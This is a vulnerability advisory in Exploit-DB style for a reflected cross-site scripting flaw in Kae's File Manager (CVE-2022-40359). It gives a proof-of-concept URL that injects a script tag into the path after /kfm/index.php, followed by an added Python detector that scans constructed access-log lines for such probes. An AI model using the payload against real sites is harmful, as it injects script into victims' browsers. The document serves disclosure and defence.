# Exploit Title: KFM Kae's File Manager - ALL - Reflected Cross-Site Scripting (XSS)
# Exploit Author: Scott Sturrock 'ssturrock -at- protonmail -dot- com'
# Vendor Homepage: https://code.google.com/archive/p/kfm/downloads
# Software Link: https://code.google.com/archive/p/kfm/downloads
# Version: ALL
# Tested on: Linux, Windows
# CVE : CVE-2022-40359
Cross-site scripting (XSS) vulnerability in KFM through 1.4.7 via a crafted GET request to /kfm/index.php: the payload placed in the path portion after index.php is reflected into the response.
Proof of concept: visit the following URL in a browser (replace {URL} with the host running KFM):
https://{URL}/kfm/index.php/'%3CSCRIPT%3Ealert('XSS');%3C/SCRIPT%3E
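As an added illustration (not part of this advisory or of KFM), the following Python scans web server access logs for requests whose path information under /kfm/index.php carries script markup, as in the PoC above. The log lines are constructed samples in Apache combined format; the double-decoding handles probes that percent-encode the payload twice.

```python
"""Detect reflected-XSS probes against KFM's /kfm/index.php in access logs.
Added example, not part of the original advisory."""
import re
from urllib.parse import unquote

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2022:13:55:36 +0000] "GET /kfm/index.php/'%3CSCRIPT%3Ealert('XSS');%3C/SCRIPT%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2022:13:56:01 +0000] "GET /kfm/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2022:13:57:12 +0000] "GET /kfm/index.php/%253Cscript%253E HTTP/1.1" 200 5120 "-" "curl/7.81"
203.0.113.9 - - [10/Oct/2022:13:58:40 +0000] "GET /other/index.php/<script> HTTP/1.1" 404 300 "-" "curl/7.81"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Markup that never belongs in a legitimate KFM path segment.
XSS_RE = re.compile(r'<\s*/?\s*script\b|javascript:|\bon\w+\s*=', re.IGNORECASE)

def fully_decode(s, rounds=3):
    """Undo repeated percent-encoding so %253C and %3C both become '<'."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s

def find_kfm_xss_probes(log_text):
    """Return (ip, timestamp, decoded_path) for requests whose PATH_INFO
    under /kfm/index.php contains script markup."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = fully_decode(m.group("path"))
        if not path.lower().startswith("/kfm/index.php/"):
            continue
        path_info = path[len("/kfm/index.php"):]
        if XSS_RE.search(path_info):
            hits.append((m.group("ip"), m.group("ts"), path))
    return hits

if __name__ == "__main__":
    for ip, ts, path in find_kfm_xss_probes(SAMPLE_LOG):
        print(f"{ts} {ip} {path}")
```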